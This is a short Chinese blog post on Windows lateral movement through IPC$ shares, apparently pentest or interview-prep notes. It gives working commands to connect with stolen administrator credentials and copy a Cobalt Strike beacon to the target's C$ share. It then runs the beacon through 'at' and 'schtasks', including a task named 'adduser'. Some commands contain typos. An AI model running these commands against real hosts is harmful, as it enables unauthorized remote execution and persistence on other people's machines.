IPC横向

渗透 面试
Created At :
Views 👀 :
  1. IPC横向
    1. 利用条件
    2. 建立IPC连接
    3. 上传木马,任务计划执行木马上线CS

IPC横向

IPC横向
IPC(Internet Process Connection)共享命名管道的资源,
是为了实现进程间通信而开放的命名管道。
IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。

利用条件

1,目标主机开启了139和445端口
2,目标主机管理员开启了ipc$默认共享:
3,知道目标机的账号密码

建立IPC连接

建立IPC连接命令:
net use \\172.16.1.132\ipc$ "password" /user:"Administrator"    #工作组
net use \server\ipc$"password" /user:domain\username             #域内

查看连接是否建立
net use

查看目标主机的文件
dir  \\172.16.1.132\c$

查看目标主机的共享
net view 172.16.1.132

断开连接:
net use \\172.16.1.132\ipc$ /del

上传木马,任务计划执行木马上线CS

上传木马
copy beacon.exe \\172.16.132\c$

创建计划任务(at<2012、schtasks>=2012):
at \\172.16.1.132 19:00 c:\beacon.exe



schtasks 在windows版本大于等于windows2012下使用

shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本

schtasks  /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务

schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。

©2016-2020 Yelog

Built with Hexo and 3-hexo theme